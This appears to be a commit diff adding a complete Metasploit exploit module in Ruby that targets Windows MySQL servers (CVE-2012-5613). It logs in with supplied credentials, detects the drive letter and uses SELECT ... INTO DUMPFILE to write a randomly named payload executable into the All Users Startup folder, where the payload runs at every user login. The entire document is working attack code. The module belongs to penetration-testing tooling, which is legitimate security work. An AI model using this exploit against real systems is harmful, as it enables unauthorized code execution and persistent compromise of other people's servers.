|
| 1 | +## |
| 2 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 3 | +## |
| 4 | + |
| 5 | +require 'msf/core' |
| 6 | + |
| 7 | +class Metasploit3 < Msf::Exploit::Remote |
| 8 | + Rank = ExcellentRanking |
| 9 | + |
| 10 | + include Msf::Exploit::Remote::MYSQL |
| 11 | + include Msf::Exploit::EXE |
| 12 | + include Msf::Exploit::FileDropper |
| 13 | + |
| 14 | + def initialize(info = {}) |
| 15 | + super(update_info(info, |
| 16 | + 'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse', |
| 17 | + 'Description' => %q{ |
| 18 | + This module takes advantage of a file privilege misconfiguration problem |
| 19 | + specifically against Windows MySQL servers. This module abuses the FILE |
| 20 | + privilege to write a payload to Microsoft's All Users Start Up directory |
| 21 | + which will execute every time a user logs in. The default All Users Start |
| 22 | + Up directory used by the module is Windows 7 friendly. |
| 23 | + }, |
| 24 | + 'Author' => |
| 25 | + [ |
| 26 | + 'sinn3r', |
| 27 | + 'Sean Verity <veritysr1980[at]gmail.com' |
| 28 | + ], |
| 29 | + 'DefaultOptions' => |
| 30 | + { |
| 31 | + 'DisablePayloadHandler' => 'true' |
| 32 | + }, |
| 33 | + 'License' => MSF_LICENSE, |
| 34 | + 'References' => |
| 35 | + [ |
| 36 | + ['CVE', '2012-5613'], #DISPUTED |
| 37 | + ['OSVDB', '88118'], |
| 38 | + ['EDB', '23083'], |
| 39 | + ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13'] |
| 40 | + ], |
| 41 | + 'Platform' => 'win', |
| 42 | + 'Targets' => |
| 43 | + [ |
| 44 | + [ 'MySQL on Windows', { } ] |
| 45 | + ], |
| 46 | + 'DefaultTarget' => 0, |
| 47 | + 'DisclosureDate' => 'Dec 01 2012' |
| 48 | + )) |
| 49 | + |
| 50 | + register_options( |
| 51 | + [ |
| 52 | + OptString.new('USERNAME', [ true, 'The username to authenticate as']), |
| 53 | + OptString.new('PASSWORD', [ true, 'The password to authenticate with']), |
| 54 | + OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/']) |
| 55 | + ]) |
| 56 | + end |
| 57 | + |
| 58 | + def check |
| 59 | + m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) |
| 60 | + return Exploit::CheckCode::Safe unless m |
| 61 | + |
| 62 | + return Exploit::CheckCode::Appears if is_windows? |
| 63 | + |
| 64 | + Exploit::CheckCode::Safe |
| 65 | + end |
| 66 | + |
| 67 | + def peer |
| 68 | + "#{rhost}:#{rport}" |
| 69 | + end |
| 70 | + |
| 71 | + def query(q) |
| 72 | + rows = [] |
| 73 | + |
| 74 | + begin |
| 75 | + res = mysql_query(q) |
| 76 | + return rows unless res |
| 77 | + res.each_hash do |row| |
| 78 | + rows << row |
| 79 | + end |
| 80 | + rescue RbMysql::ParseError |
| 81 | + return rows |
| 82 | + end |
| 83 | + |
| 84 | + rows |
| 85 | + end |
| 86 | + |
| 87 | + def is_windows? |
| 88 | + r = query("SELECT @@version_compile_os;") |
| 89 | + r[0]['@@version_compile_os'] =~ /^Win/ ? true : false |
| 90 | + end |
| 91 | + |
| 92 | + def get_drive_letter |
| 93 | + r = query("SELECT @@tmpdir;") |
| 94 | + drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || '' |
| 95 | + |
| 96 | + drive |
| 97 | + end |
| 98 | + |
| 99 | + def upload_file(bin, dest) |
| 100 | + p = bin.unpack("H*")[0] |
| 101 | + query("SELECT 0x#{p} into DUMPFILE '#{dest}'") |
| 102 | + end |
| 103 | + |
| 104 | + def exploit |
| 105 | + unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/') |
| 106 | + fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") |
| 107 | + end |
| 108 | + |
| 109 | + print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") |
| 110 | + begin |
| 111 | + m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) |
| 112 | + rescue RbMysql::AccessDeniedError |
| 113 | + fail_with(Failure::NoAccess, "#{peer} - Access denied") |
| 114 | + end |
| 115 | + |
| 116 | + fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m |
| 117 | + |
| 118 | + unless is_windows? |
| 119 | + fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows") |
| 120 | + end |
| 121 | + |
| 122 | + begin |
| 123 | + drive = get_drive_letter |
| 124 | + rescue RbMysql::ParseError |
| 125 | + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") |
| 126 | + end |
| 127 | + |
| 128 | + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive |
| 129 | + |
| 130 | + exe_name = Rex::Text::rand_text_alpha(5) + ".exe" |
| 131 | + dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" |
| 132 | + exe = generate_payload_exe |
| 133 | + |
| 134 | + print_status("#{peer} - Uploading to '#{dest}'") |
| 135 | + begin |
| 136 | + upload_file(exe, dest) |
| 137 | + rescue RbMysql::AccessDeniedError |
| 138 | + fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)") |
| 139 | + end |
| 140 | + register_file_for_cleanup("#{dest}") |
| 141 | + end |
| 142 | + |
| 143 | +end |
0 commit comments